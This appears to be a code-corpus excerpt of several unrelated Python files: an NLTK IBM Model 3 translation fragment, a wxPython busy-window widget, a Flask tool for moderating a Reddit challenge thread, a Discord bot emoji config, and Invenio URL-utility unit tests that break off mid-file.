return MIN_PROB
# Compute combination (m - null_fertility) choose null_fertility
for i in range(1, null_fertility + 1):
probability *= (m - null_fertility - i + 1) / i
if probability < MIN_PROB:
return MIN_PROB
# Combine fertility probabilities
for i in range(1, l + 1):
fertility = alignment_info.fertility_of_i(i)
probability *= (factorial(fertility) *
self.fertility_table[fertility][src_sentence[i]])
if probability < MIN_PROB:
return MIN_PROB
# Combine lexical and distortion probabilities
for j in range(1, m + 1):
t = trg_sentence[j]
i = alignment_info.alignment[j]
s = src_sentence[i]
probability *= (self.translation_table[t][s] *
self.distortion_table[j][i][l][m])
if probability < MIN_PROB:
return MIN_PROB
return probability
class Model3Counts(Counts):
"""
Data object to store counts of various parameters during training.
Includes counts for distortion.
"""
def __init__(self):
super(Model3Counts, self).__init__()
self.distortion = defaultdict(
lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(
lambda: 0.0))))
self.distortion_for_any_j = defaultdict(
lambda: defaultdict(lambda: defaultdict(lambda: 0.0)))
def update_distortion(self, count, alignment_info, j, l, m):
i = alignment_info.alignment[j]
self.distortion[j][i][l][m] += count
self.distortion_for_any_j[i][l][m] += count
| nelango/ViralityAnalysis | model/lib/nltk/translate/ibm3.py | Python | mit | 13,875 | 0.000865 |
"""
:class:`PyBusyInfo` constructs a busy info window and displays a message in it.
Description
===========
:class:`PyBusyInfo` constructs a busy info window and displays a message in it.
This class makes it easy to tell your user that the program is temporarily busy.
Just create a :class:`PyBusyInfo` object, and within the current scope, a message window
will be shown.
For example::
busy = PyBusyInfo("Please wait, working...")
for i in xrange(10000):
DoACalculation()
del busy
It works by creating a window in the constructor, and deleting it in the destructor.
You may also want to call :func:`Yield` () to refresh the window periodically (in case
it had been obscured by other windows, for example).
Usage
=====
Usage example::
import wx
import wx.lib.agw.pybusyinfo as PBI
class MyFrame(wx.Frame):
def __init__(self, parent):
wx.Frame.__init__(self, parent, -1, "PyBusyInfo Demo")
panel = wx.Panel(self)
b = wx.Button(panel, -1, "Test PyBusyInfo ", (50,50))
self.Bind(wx.EVT_BUTTON, self.OnButton, b)
def OnButton(self, event):
message = "Please wait 5 seconds, working..."
busy = PBI.PyBusyInfo(message, parent=self, title="Really Busy")
wx.Yield()
for indx in xrange(5):
wx.MilliSleep(1000)
del busy
# our normal wxApp-derived class, as usual
app = wx.App(0)
frame = MyFrame(None)
app.SetTopWindow(frame)
frame.Show()
app.MainLoop()
Supported Platforms
===================
:class:`PyBusyInfo` has been tested on the following platforms:
* Windows (Windows XP).
Window Styles
=============
`No particular window styles are available for this class.`
Events Processing
=================
`No custom events are available for this class.`
License And Version
===================
:class:`PyBusyInfo` is distributed under the wxPython license.
Latest Revision: Andrea Gavana @ 20 Mar 2012, 21.00 GMT
Version 0.2
"""
# Version Info
__version__ = "0.2"
import wx
_ = wx.GetTranslation
class PyInfoFrame(wx.Frame):
""" Base class for :class:`PyBusyInfo`. """
def __init__(self, parent, message, title, icon):
"""
Default class constructor.
:param `parent`: the frame parent;
:param `message`: the message to display in the :class:`PyBusyInfo`;
:param `title`: the main :class:`PyBusyInfo` title;
:param `icon`: an icon to draw as the frame icon, an instance of :class:`Bitmap`.
"""
wx.Frame.__init__(self, parent, wx.ID_ANY, title, wx.DefaultPosition,
wx.DefaultSize, wx.NO_BORDER|wx.FRAME_TOOL_WINDOW|wx.FRAME_SHAPED|wx.STAY_ON_TOP)
panel = wx.Panel(self)
panel.SetCursor(wx.HOURGLASS_CURSOR)
self._message = message
self._title = title
self._icon = icon
dc = wx.ClientDC(self)
textWidth, textHeight, dummy = dc.GetMultiLineTextExtent(self._message)
sizeText = wx.Size(textWidth, textHeight)
self.SetClientSize((max(sizeText.x, 340) + 60, max(sizeText.y, 40) + 60))
# need to size the panel correctly first so that text.Centre() works
panel.SetSize(self.GetClientSize())
# Bind the events to draw ourselves
panel.Bind(wx.EVT_PAINT, self.OnPaint)
panel.Bind(wx.EVT_ERASE_BACKGROUND, self.OnErase)
self.Centre(wx.BOTH)
# Create a non-rectangular region to set the frame shape
size = self.GetSize()
bmp = wx.EmptyBitmap(size.x, size.y)
dc = wx.BufferedDC(None, bmp)
dc.SetBackground(wx.Brush(wx.Colour(0, 0, 0), wx.SOLID))
dc.Clear()
dc.SetPen(wx.Pen(wx.Colour(0, 0, 0), 1))
dc.DrawRoundedRectangle(0, 0, size.x, size.y, 12)
r = wx.RegionFromBitmapColour(bmp, wx.Colour(0, 0, 0))
# Store the non-rectangular region
self.reg = r
if wx.Platform == "__WXGTK__":
self.Bind(wx.EVT_WINDOW_CREATE, self.SetBusyShape)
else:
self.SetBusyShape()
# Add a custom bitmap at the top (if any)
def SetBusyShape(self, event=None):
"""
Sets :class:`PyInfoFrame` shape using the region created from the bitmap.
:param `event`: a :class:`WindowCreateEvent` event (GTK only, as GTK supports setting
the window shape only during window creation).
"""
self.SetShape(self.reg)
if event:
# GTK only
event.Skip()
def OnPaint(self, event):
"""
Handles the ``wx.EVT_PAINT`` event for :class:`PyInfoFrame`.
:param `event`: a :class:`PaintEvent` to be processed.
"""
panel = event.GetEventObject()
dc = wx.BufferedPaintDC(panel)
dc.Clear()
# Fill the background with a gradient shading
startColour = wx.SystemSettings_GetColour(wx.SYS_COLOUR_ACTIVECAPTION)
endColour = wx.WHITE
rect = panel.GetRect()
dc.GradientFillLinear(rect, startColour, endColour, wx.SOUTH)
# Draw the label
font = wx.SystemSettings_GetFont(wx.SYS_DEFAULT_GUI_FONT)
dc.SetFont(font)
# Draw the message
rect2 = wx.Rect(*rect)
rect2.height += 20
dc.DrawLabel(self._message, rect2, alignment=wx.ALIGN_CENTER|wx.ALIGN_CENTER)
# Draw the top title
font.SetWeight(wx.BOLD)
dc.SetFont(font)
dc.SetPen(wx.Pen(wx.SystemSettings_GetColour(wx.SYS_COLOUR_CAPTIONTEXT)))
dc.SetTextForeground(wx.SystemSettings_GetColour(wx.SYS_COLOUR_CAPTIONTEXT))
if self._icon.IsOk():
iconWidth, iconHeight = self._icon.GetWidth(), self._icon.GetHeight()
dummy, textHeight = dc.GetTextExtent(self._title)
textXPos, textYPos = iconWidth + 10, (iconHeight-textHeight)/2
dc.DrawBitmap(self._icon, 5, 5, True)
else:
textXPos, textYPos = 5, 0
dc.DrawText(self._title, textXPos, textYPos+5)
dc.DrawLine(5, 25, rect.width-5, 25)
size = self.GetSize()
dc.SetPen(wx.Pen(startColour, 1))
dc.SetBrush(wx.TRANSPARENT_BRUSH)
dc.DrawRoundedRectangle(0, 0, size.x, size.y-1, 12)
def OnErase(self, event):
"""
Handles the ``wx.EVT_ERASE_BACKGROUND`` event for :class:`PyInfoFrame`.
:param `event`: a :class:`EraseEvent` event to be processed.
:note: This method is intentionally empty to reduce flicker.
"""
# This is empty on purpose, to avoid flickering
pass
# -------------------------------------------------------------------- #
# The actual PyBusyInfo implementation
# -------------------------------------------------------------------- #
class PyBusyInfo(object):
"""
Constructs a busy info window as child of parent and displays a message in it.
"""
def __init__(self, message, parent=None, title=_("Busy"), icon=wx.NullBitmap):
"""
Default class constructor.
:param `parent`: the :class:`PyBusyInfo` parent;
:param `message`: the message to display in the :class:`PyBusyInfo`;
:param `title`: the main :class:`PyBusyInfo` title;
:param `icon`: an icon to draw as the frame icon, an instance of :class:`Bitmap`.
:note: If `parent` is not ``None`` you must ensure that it is not closed
while the busy info is shown.
"""
self._infoFrame = PyInfoFrame(parent, message, title, icon)
if parent and parent.HasFlag(wx.STAY_ON_TOP):
# we must have this flag to be in front of our parent if it has it
self._infoFrame.SetWindowStyleFlag(wx.STAY_ON_TOP)
# Added for the screenshot-taking tool
self.Show()
def __del__(self):
""" Overloaded method, for compatibility with wxWidgets. """
self._infoFrame.Show(False)
self._infoFrame.Destroy()
def Show(self, show=True):
"""
Shows or hides the window.
You may need to call `Raise` for a top level window if you want to bring it to
top, although this is not needed if :meth:`PyBusyInfo.Show` is called immediately after the frame creation.
:param bool `show`: ``True`` to show the :class:`PyBusyInfo` frame, ``False`` to hide it.
:return: ``True`` if the window has been shown or hidden or ``False`` if nothing was done
because it already was in the requested state.
.. note::
Notice that the default state of newly created top level windows is hidden (to allow
you to create their contents without flicker) unlike for all the other, not derived from
:class:`TopLevelWindow`, windows that are by default created in the shown state.
.. versionadded:: 0.9.5
"""
retVal = self._infoFrame.Show(show)
if show:
self._infoFrame.Refresh()
self._infoFrame.Update()
return retVal
def Update(self):
"""
Calling this method immediately repaints the invalidated area of the window and all of its
children recursively (this normally only happens when the flow of control returns to the
event loop).
:note: Notice that this function doesn't invalidate any area of the window so nothing happens
if nothing has been invalidated (i.e. marked as requiring a redraw). Use `Refresh` first if
you want to immediately redraw the window unconditionally.
.. versionadded:: 0.9.5
"""
self._infoFrame.Update()
| garrettcap/Bulletproof-Backup | wx/lib/agw/pybusyinfo.py | Python | gpl-2.0 | 9,862 | 0.005983 |
#This is a cell with a custom comment as marker
x=10
y=11
print(x+y)
| HugoGuillen/nb2py | tutorial_files/custom.py | Python | mit | 70 | 0.057143 |
#!/usr/bin/python
# TODO: issues with new oauth2 stuff. Keep using older version of Python for now.
# #!/usr/bin/env python
import subprocess
import praw
import datetime
import pyperclip
from hashlib import sha1
from flask import Flask
from flask import Response
from flask import request
from cStringIO import StringIO
from base64 import b64encode
from base64 import b64decode
from ConfigParser import ConfigParser
import OAuth2Util
import os
import markdown
import bleach
# encoding=utf8
import sys
from participantCollection import ParticipantCollection
reload(sys)
sys.setdefaultencoding('utf8')
# Edit Me!
challengePageSubmissionId = '68lss2'
flaskport = 8891
thisMonthName = "May"
nextMonthName = "June"
readAllCommentsWhichCanBeSlower = False
sorryTooLateToSignUpReplyText = "Sorry, but the late signup grace period for " + thisMonthName + " is over, so you can't officially join this challenge. But feel free to follow along anyway, and comment all you want. And be sure to join us for the " + nextMonthName + " challenge. Signup posts for " + nextMonthName + " will begin during the last week of " + thisMonthName + "."
reinstatedReplyText = "OK, I've reinstated you. You should start showing up on the list again starting tomorrow."
app = Flask(__name__)
app.debug = True
commentHashesAndComments = {}
submission = None
def loginAndReturnRedditSession():
config = ConfigParser()
config.read("../reddit-password-credentials.cfg")
user = config.get("Reddit", "user")
password = config.get("Reddit", "password")
# TODO: password auth is going away, and we will soon need to do oauth.
redditSession = praw.Reddit(user_agent='Test Script by /u/foobarbazblarg')
redditSession.login(user, password, disable_warning=True)
# submissions = redditSession.get_subreddit('pornfree').get_hot(limit=5)
# print [str(x) for x in submissions]
return redditSession
def loginOAuthAndReturnRedditSession():
redditSession = praw.Reddit(user_agent='Test Script by /u/foobarbazblarg')
o = OAuth2Util.OAuth2Util(redditSession, print_log=True, configfile="../reddit-oauth-credentials.cfg")
# TODO: Testing comment of refresh. We authenticate fresh every time, so presumably no need to do o.refresh().
# o.refresh(force=True)
return redditSession
def getSubmissionForRedditSession(redditSession):
submission = redditSession.get_submission(submission_id=challengePageSubmissionId)
if readAllCommentsWhichCanBeSlower:
submission.replace_more_comments(limit=None, threshold=0)
return submission
def getCommentsForSubmission(submission):
return [comment for comment in praw.helpers.flatten_tree(submission.comments) if comment.__class__ == praw.objects.Comment]
def retireCommentHash(commentHash):
with open("retiredcommenthashes.txt", "a") as commentHashFile:
commentHashFile.write(commentHash + '\n')
def retiredCommentHashes():
with open("retiredcommenthashes.txt", "r") as commentHashFile:
# return commentHashFile.readlines()
return commentHashFile.read().splitlines()
@app.route('/moderatechallenge.html')
def moderatechallenge():
currentDayOfMonthIndex = datetime.date.today().day
lateCheckinGracePeriodIsInEffect = currentDayOfMonthIndex <= 3
global commentHashesAndComments
global submission
commentHashesAndComments = {}
stringio = StringIO()
stringio.write('<html>\n<head>\n</head>\n\n')
# redditSession = loginAndReturnRedditSession()
redditSession = loginOAuthAndReturnRedditSession()
submission = getSubmissionForRedditSession(redditSession)
flat_comments = getCommentsForSubmission(submission)
retiredHashes = retiredCommentHashes()
i = 1
stringio.write('<iframe name="invisibleiframe" style="display:none;"></iframe>\n')
stringio.write("<h3>")
stringio.write(os.getcwd())
stringio.write("<br>\n")
stringio.write(submission.title)
stringio.write("</h3>\n\n")
stringio.write('<form action="copydisplaytoclipboard.html" method="post" target="invisibleiframe">')
stringio.write('<input type="submit" name="actiontotake" value="Copy display.py stdout to clipboard">')
stringio.write('<input type="submit" name="actiontotake" value="Automatically post display.py stdout">')
stringio.write('</form>')
stringio.write('<form action="updategooglechart.html" method="post" target="invisibleiframe">')
stringio.write('<input type="submit" value="update-google-chart.py">')
stringio.write('</form>')
for comment in flat_comments:
# print comment.is_root
# print comment.score
i += 1
commentHash = sha1()
commentHash.update(comment.permalink)
commentHash.update(comment.body.encode('utf-8'))
commentHash = commentHash.hexdigest()
if commentHash not in retiredHashes:
commentHashesAndComments[commentHash] = comment
authorName = str(comment.author) # can be None if author was deleted. So check for that and skip if it's None.
participant = ParticipantCollection().participantNamed(authorName)
stringio.write("<hr>\n")
stringio.write('<font color="blue"><b>')
stringio.write(authorName)
stringio.write('</b></font><br>')
if ParticipantCollection().hasParticipantNamed(authorName):
stringio.write(' <small><font color="green">(member)</font></small>')
if participant.isStillIn:
stringio.write(' <small><font color="green">(still in)</font></small>')
else:
stringio.write(' <small><font color="red">(out)</font></small>')
if participant.hasCheckedIn:
stringio.write(' <small><font color="green">(checked in)</font></small>')
else:
stringio.write(' <small><font color="orange">(not checked in)</font></small>')
if participant.hasRelapsed:
stringio.write(' <small><font color="red">(relapsed)</font></small>')
else:
stringio.write(' <small><font color="green">(not relapsed)</font></small>')
else:
stringio.write(' <small><font color="red">(not a member)</font></small>')
stringio.write('<form action="takeaction.html" method="post" target="invisibleiframe">')
if lateCheckinGracePeriodIsInEffect:
stringio.write('<input type="submit" name="actiontotake" value="Checkin">')
stringio.write('<input type="submit" name="actiontotake" value="Signup and checkin" style="color:white;background-color:green">')
else:
stringio.write('<input type="submit" name="actiontotake" value="Checkin" style="color:white;background-color:green">')
stringio.write('<input type="submit" name="actiontotake" value="Signup and checkin">')
stringio.write('<input type="submit" name="actiontotake" value="Relapse" style="color:white;background-color:red">')
stringio.write('<input type="submit" name="actiontotake" value="Reinstate with automatic comment">')
stringio.write('<input type="submit" name="actiontotake" value="Reply with sorry-too-late comment">')
stringio.write('<input type="submit" name="actiontotake" value="Skip comment">')
stringio.write('<input type="submit" name="actiontotake" value="Skip comment and don\'t upvote">')
stringio.write('<input type="hidden" name="username" value="' + b64encode(authorName) + '">')
stringio.write('<input type="hidden" name="commenthash" value="' + commentHash + '">')
stringio.write('<input type="hidden" name="commentpermalink" value="' + comment.permalink + '">')
stringio.write('</form>')
stringio.write(bleach.clean(markdown.markdown(comment.body.encode('utf-8')), tags=['p']))
stringio.write("\n<br><br>\n\n")
stringio.write('</html>')
pageString = stringio.getvalue()
stringio.close()
return Response(pageString, mimetype='text/html')
@app.route('/takeaction.html', methods=["POST"])
def takeaction():
username = b64decode(request.form["username"])
commentHash = str(request.form["commenthash"])
# commentPermalink = request.form["commentpermalink"]
actionToTake = request.form["actiontotake"]
# print commentHashesAndComments
comment = commentHashesAndComments[commentHash]
# print "comment: " + str(comment)
if actionToTake == 'Checkin':
print "checkin - " + username
subprocess.call(['./checkin.py', username])
comment.upvote()
retireCommentHash(commentHash)
if actionToTake == 'Signup and checkin':
print "signup and checkin - " + username
subprocess.call(['./signup-and-checkin.sh', username])
comment.upvote()
retireCommentHash(commentHash)
elif actionToTake == 'Relapse':
print "relapse - " + username
subprocess.call(['./relapse.py', username])
comment.upvote()
retireCommentHash(commentHash)
elif actionToTake == 'Reinstate with automatic comment':
print "reinstate - " + username
subprocess.call(['./reinstate.py', username])
comment.reply(reinstatedReplyText)
comment.upvote()
retireCommentHash(commentHash)
elif actionToTake == 'Reply with sorry-too-late comment':
print "reply with sorry-too-late comment - " + username
comment.reply(sorryTooLateToSignUpReplyText)
comment.upvote()
retireCommentHash(commentHash)
elif actionToTake == 'Skip comment':
print "Skip comment - " + username
comment.upvote()
retireCommentHash(commentHash)
elif actionToTake == "Skip comment and don't upvote":
print "Skip comment and don't upvote - " + username
retireCommentHash(commentHash)
return Response("hello", mimetype='text/html')
@app.route('/copydisplaytoclipboard.html', methods=["POST"])
def copydisplaytoclipboard():
actionToTake = request.form["actiontotake"]
if actionToTake == 'Copy display.py stdout to clipboard':
subprocess.call(['./display.py'])
if actionToTake == 'Automatically post display.py stdout':
subprocess.call(['./display.py'])
submissionText = pyperclip.paste()
submission.edit(submissionText)
return Response("hello", mimetype='text/html')
@app.route('/updategooglechart.html', methods=["POST"])
def updategooglechart():
print "TODO: Copy display to clipboard"
subprocess.call(['./update-google-chart.py'])
return Response("hello", mimetype='text/html')
if __name__ == '__main__':
app.run(host='127.0.0.1', port=flaskport)
| foobarbazblarg/stayclean | stayclean-2017-may/serve-challenge-with-flask.py | Python | mit | 10,823 | 0.003326 |
"""Config file for the emojis that Chiaki will use.
RENAME THIS FILE TO emojis.py OTHERWISE IT WON'T WORK.
By default it uses the unicode emojis. However, you can specify
server emojis in one of the two possible ways:
1. The raw string of the emoji. This is the format <:name:id>. You can find this
by placing a backslash before the emoji.
2. The ID of the emoji. This must be an integer. And can be shown through the
same method.
Note that bots have "nitro" status when it comes to emojis. So as long as
it's in the server that has the custom emoji, the bot can use it on any other
server it's in.
"""
# ------- Confirmation emojis (for Context.ask_confirmation) -------
# Confirm option
confirm = '\N{WHITE HEAVY CHECK MARK}'
# Deny Option
deny = '\N{CROSS MARK}'
# ------- Status emojis (for various info commands) ----------------
online = '\N{GREEN HEART}'
idle = '\N{YELLOW HEART}'
dnd = '\N{HEAVY BLACK HEART}'
offline = '\N{BLACK HEART}'
streaming = '\N{PURPLE HEART}'
bot_tag = '\N{ROBOT FACE}'
# ------- Currency Emoji -------------
money = '\N{BANKNOTE WITH DOLLAR SIGN}'
# ------ Numbers -----
# Right now it uses the default key-caps
# However, you may specify custom emojis if needed
#
# Note: The numbers are what *Discord sees them as*. Technically the
# actual keycap number emoji would be {number}\ufe0f\u20e3. But discord
# instead sends it as {number}\u20e3 (without the \ufe0f). Do not add the
# \fe0f in, otherwise it won't send as an actual number.
numbers = [
f'{n}\u20e3' for n in range(10)
]
# ------- Minesweeper -------
# Not an emoji per se but set to True if you want to be able to use external
# emojis for Minesweeper. This only applies to Minesweeper as this changes
# the control scheme if she's able to use external emojis.
#
# Note that if Chiaki doesn't have Use External Emojis she'll be forced to
# use the default control scheme by default.
msw_use_external_emojis = False
msw_y_row = [
# Should have emojis representing 1-17.
# If you set msw_use_external_emojis to True this *must* be filled.
]
msw_letters = [
# Should have emojis representing A-Q or some equivalent.
# If you set msw_use_external_emojis to True this *must* be filled.
]
# ------ Connect-Four -------
c4_winning_tiles = [
'\N{HEAVY BLACK HEART}',
'\N{BLUE HEART}'
]
# ------- Sudoku ------
sudoku_clues = [
f'{n}\u20e3' for n in range(1, 9)
]
# ------- Checkers -------
checkers_black_king = '\N{HEAVY BLACK HEART}'
checkers_white_king = '\N{BLUE HEART}'
checkers_black_last_move = ''
checkers_white_last_move = ''
# -------- Shards ---------
shard_connecting = ''
shard_online = ''
shard_disconnecting = ''
shard_offline = ''
| Ikusaba-san/Chiaki-Nanami | emojistemplate.py | Python | mit | 2,702 | 0.00037 |
# -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2009, 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Unit tests for the urlutils library."""
__revision__ = "$Id$"
from invenio.testutils import InvenioTestCase
from cgi import parse_qs
from invenio.config import CFG_SITE_URL
from invenio.testutils import make_test_suite, run_test_suite
from invenio.urlutils import (create_AWS_request_url,
string_to_numeric_char_reference,
make_canonical_urlargd,
create_html_link,
create_html_mailto,
same_urls_p,
HASHLIB_IMPORTED,
wash_url_argument,
create_url,
create_Indico_request_url,
get_relative_url)
class TestWashUrlArgument(InvenioTestCase):
def test_wash_url_argument(self):
"""urlutils - washing of URL arguments"""
self.assertEqual(1,
wash_url_argument(['1'], 'int'))
self.assertEqual("1",
wash_url_argument(['1'], 'str'))
self.assertEqual(['1'],
wash_url_argument(['1'], 'list'))
self.assertEqual(0,
wash_url_argument('ellis', 'int'))
self.assertEqual("ellis",
wash_url_argument('ellis', 'str'))
self.assertEqual(["ellis"],
wash_url_argument('ellis', 'list'))
self.assertEqual(0,
wash_url_argument(['ellis'], 'int'))
self.assertEqual("ellis",
wash_url_argument(['ellis'], 'str'))
self.assertEqual(["ellis"],
wash_url_argument(['ellis'], 'list'))
class TestUrls(InvenioTestCase):
"""Tests on URLs"""
def test_url_creation(self):
"""urlutils - test url creation"""
self.assertEqual(create_url('http://www.a.com/search',
{'recid':3, 'of':'hb&'},
escape_urlargd=True),
'http://www.a.com/search?of=hb%26&recid=3')
self.assertEqual(create_url('http://www.a.com/search',
{'recid':3, 'of':'hb&'},
escape_urlargd=False),
'http://www.a.com/search?of=hb&&recid=3')
def test_canonical_urlargd_creation(self):
"""urlutils - test creation of canonical URLs"""
self.assertEqual(make_canonical_urlargd({'a' : 1,
'b' : '2',
'b&': '2=',
':' : '?&'},
{'a': ('int', 1),
'b': ('str', 2)}),
"?b%26=2%3D&%3A=%3F%26&b=2")
if HASHLIB_IMPORTED:
def test_signed_aws_request_creation(self):
"""urlutils - test creation of signed AWS requests"""
signed_aws_request_url = create_AWS_request_url("http://webservices.amazon.com/onca/xml",
{'AWSAccessKeyId': '00000000000000000000',
'Service': 'AWSECommerceService',
'Operation': 'ItemLookup',
'ItemId': '0679722769',
'ResponseGroup': 'ItemAttributes,Offers,Images,Reviews',
'Version': '2009-01-06'},
"1234567890",
_timestamp="2009-01-01T12:00:00Z")
# Are we at least acccessing correct base url?
self.assert_(signed_aws_request_url.startswith("http://webservices.amazon.com/onca/xml"))
# Check that parameters with special characters (, :) get correctly
# encoded/decoded
## Note: using parse_qs() url-decodes the string
self.assertEqual(parse_qs(signed_aws_request_url)["ResponseGroup"],
['ItemAttributes,Offers,Images,Reviews'])
self.assert_('ItemAttributes%2COffers%2CImages%2CReviews' \
in signed_aws_request_url)
self.assertEqual(parse_qs(signed_aws_request_url)["Timestamp"],
['2009-01-01T12:00:00Z'])
# Check signature exists and is correct
self.assertEqual(parse_qs(signed_aws_request_url)["Signature"],
['Nace+U3Az4OhN7tISqgs1vdLBHBEijWcBeCqL5xN9xg='])
self.assert_('Nace%2BU3Az4OhN7tISqgs1vdLBHBEijWcBeCqL5xN9xg%3D&Operation' \
in signed_aws_request_url)
# Continute with an additional request
signed_aws_request_url_2 = \
create_AWS_request_url("http://ecs.amazonaws.co.uk/onca/xml",
{'AWSAccessKeyId': '00000000000000000000',
'Actor': 'Johnny Depp',
'AssociateTag': 'mytag-20',
'Operation': 'ItemSearch',
'ResponseGroup': 'ItemAttributes,Offers,Images,Reviews,Variations',
'SearchIndex': 'DVD',
'Service': 'AWSECommerceService',
'Sort': 'salesrank',
'Version': '2009-01-01'},
"1234567890",
_timestamp="2009-01-01T12:00:00Z")
# Check signature exists and is correct
self.assertEqual(parse_qs(signed_aws_request_url_2)["Signature"],
['TuM6E5L9u/uNqOX09ET03BXVmHLVFfJIna5cxXuHxiU='])
def test_signed_Indico_request_creation(self):
"""urlutils - test creation of signed Indico requests"""
signed_Indico_request_url = create_Indico_request_url("https://indico.cern.ch",
"categ",
"",
[1, 7],
"xml",
{'onlypublic': 'yes',
'order': 'title',
'from': 'today',
'to': 'tomorrow'},
'00000000-0000-0000-0000-000000000000',
'00000000-0000-0000-0000-000000000000',
_timestamp=1234)
# Are we at least acccessing correct base url?
self.assert_(signed_Indico_request_url.startswith("https://indico.cern.ch/export/categ/1-7.xml?"))
# Check parameters
self.assertEqual(parse_qs(signed_Indico_request_url)["order"],
['title'])
self.assertEqual(parse_qs(signed_Indico_request_url)["timestamp"],
['1234'])
# Check signature exists and is correct
self.assertEqual(parse_qs(signed_Indico_request_url)["signature"],
['e984e0c683e36ce3544372f23a397fd2400f4954'])
def test_same_urls_p(self):
"""urlutils - test checking URLs equality"""
self.assertEqual(same_urls_p(CFG_SITE_URL + '?a=b&c=d&e=f',
CFG_SITE_URL + '?e=f&c=d&a=b'),
True)
self.assertEqual(same_urls_p(CFG_SITE_URL + '?a=b&c=d&e=f&ln=fr',
CFG_SITE_URL + '?e=f&c=d&a=b&ln=en'),
False)
class TestHtmlLinks(InvenioTestCase):
"""Tests on HTML links"""
def test_html_link_creation(self):
"""urlutils - test creation of HTML links"""
# Check with various encoding and escaping traps
self.assertEqual(create_html_link('http://www.a.com',
{'a' : 1,
'b' : '2',
'b&': '2=',
':' : '?'},
'my label > & better than yours',
{'style': 'color:#f00',
'target': "_blank"}),
'<a href="http://www.a.com?a=1&%3A=%3F&b%26=2%3D&b=2" style="color:#f00" target="_blank">my label > & better than yours</a>')
def test_html_link_creation_no_argument_escaping(self):
"""urlutils - test creation of HTML links, without arguments escaping"""
self.assertEqual(create_html_link('http://www.a.com',
{'a' : 1,
'b' : '2',
'b&': '2=',
':' : '?'},
'my label > & better than yours',
{'style': 'color:#f00',
'target': "_blank"},
escape_urlargd=False),
'<a href="http://www.a.com?a=1&:=?&b&=2=&b=2" style="color:#f00" target="_blank">my label > & better than yours</a>')
def test_html_link_creation_no_attribute_escaping(self):
"""urlutils - test creation of HTML links, without attributes escaping"""
self.assertEqual(create_html_link('http://www.a.com',
{'a' : 1,
'b' : '2',
'b&': '2=',
':' : '?'},
'my label > & better than yours',
{'style': 'color:#f00',
'target': "_blank"},
escape_linkattrd=False),
'<a href="http://www.a.com?a=1&%3A=%3F&b%26=2%3D&b=2" style="color:#f00" target="_blank">my label > & better than yours</a>')
def test_string_to_numeric_char_reference(self):
"""urlutils - test numeric character conversion from string"""
self.assertEqual(string_to_numeric_char_reference('abc123'),
"abc123")
self.assertEqual(string_to_numeric_char_reference('\/&;,#$%~é'),
"\/&;,#$%~é")
class TestEmailObfuscationMode(InvenioTestCase):
"""Tests on HTML mailto links creation and obfuscation modes"""
def test_html_mailto_obfuscation_mode_minus1(self):
"""urlutils - test creation of HTML "mailto" links, obfuscation mode -1"""
self.assertEqual(create_html_mailto('[email protected]',
subject='Hey there',
body='Lunch at 8pm?\ncu!',
bcc='[email protected]',
link_label="Date creator",
linkattrd={'style': 'text-decoration: blink'},
email_obfuscation_mode=-1),
'')
def test_html_mailto_obfuscation_mode_0(self):
"""urlutils - test creation of HTML "mailto" links, obfuscation mode 0"""
self.assertEqual(create_html_mailto('[email protected]',
subject='Hey there',
body='Lunch at 8pm?\ncu!',
bcc='[email protected]',
link_label="Date creator",
linkattrd={'style': 'text-decoration: blink'},
email_obfuscation_mode=0),
'<a href="mailto:[email protected]?body=Lunch%20at%208pm%3F%0D%0Acu%21&bcc=romeo%40cds.cern.ch&subject=Hey%20there" style="text-decoration: blink">Date creator</a>')
def test_html_mailto_obfuscation_mode_1(self):
"""urlutils - test creation of HTML "mailto" links, obfuscation mode 1"""
self.assertEqual(create_html_mailto('[email protected]',
subject='Hey there',
body='Lunch at 8pm?\ncu!',
bcc='[email protected]',
link_label="Date creator",
linkattrd={'style': 'text-decoration: blink'},
email_obfuscation_mode=1),
'<a href="mailto:juliet [at] cds [dot] cern [dot] ch?body=Lunch%20at%208pm%3F%0D%0Acu%21&bcc=romeo%40cds.cern.ch&subject=Hey%20there" style="text-decoration: blink">Date creator</a>')
def test_html_mailto_obfuscation_mode_2(self):
"""urlutils - test creation of HTML "mailto" links, obfuscation mode 2"""
self.assertEqual(create_html_mailto('[email protected]',
subject='Hey there',
body='Lunch at 8pm?\ncu!',
bcc='[email protected]',
link_label="Date creator",
linkattrd={'style': 'text-decoration: blink'},
email_obfuscation_mode=2),
'<a href="mailto:juliet@cds.cern.ch?body=Lunch%20at%208pm%3F%0D%0Acu%21&bcc=romeo%40cds.cern.ch&subject=Hey%20there" style="text-decoration: blink">Date creator</a>')
def test_html_mailto_obfuscation_mode_3(self):
"""urlutils - test creation of HTML "mailto" links, obfuscation mode 3"""
self.assertEqual(create_html_mailto('[email protected]',
subject='Hey there',
body='Lunch at 8pm?\ncu!',
bcc='[email protected]',
link_label="Date creator",
linkattrd={'style': 'text-decoration: blink'},
email_obfuscation_mode=3),
'<script language="JavaScript" type="text/javascript">document.write(\'>a/<rotaerc etaD>"knilb :noitaroced-txet"=elyts "ereht02%yeH=tcejbus;pma&hc.nrec.sdc04%oemor=ccb;pma&12%ucA0%D0%F3%mp802%ta02%hcnuL=ydob?hc.nrec.sdc@teiluj:otliam"=ferh a<\'.split("").reverse().join(""))</script>')
def test_html_mailto_obfuscation_mode_4(self):
"""urlutils - test creation of HTML "mailto" links, obfuscation mode 4"""
self.assertEqual(create_html_mailto('[email protected]',
subject='Hey there',
body='Lunch at 8pm?\ncu!',
bcc='[email protected]',
link_label="Date creator",
linkattrd={'style': 'text-decoration: blink'},
email_obfuscation_mode=4),
'juliet<img src="%(CFG_SITE_URL)s/img/at.gif" alt=" [at] " style="vertical-align:baseline" />cds<img src="%(CFG_SITE_URL)s/img/dot.gif" alt=" [dot] " style="vertical-align:bottom" />cern<img src="%(CFG_SITE_URL)s/img/dot.gif" alt=" [dot] " style="vertical-align:bottom" />ch' % \
{'CFG_SITE_URL': CFG_SITE_URL})
class TestRelativeURL(InvenioTestCase):
"""Tests the get_relative_url function with different input strings"""
def test_relative_url(self):
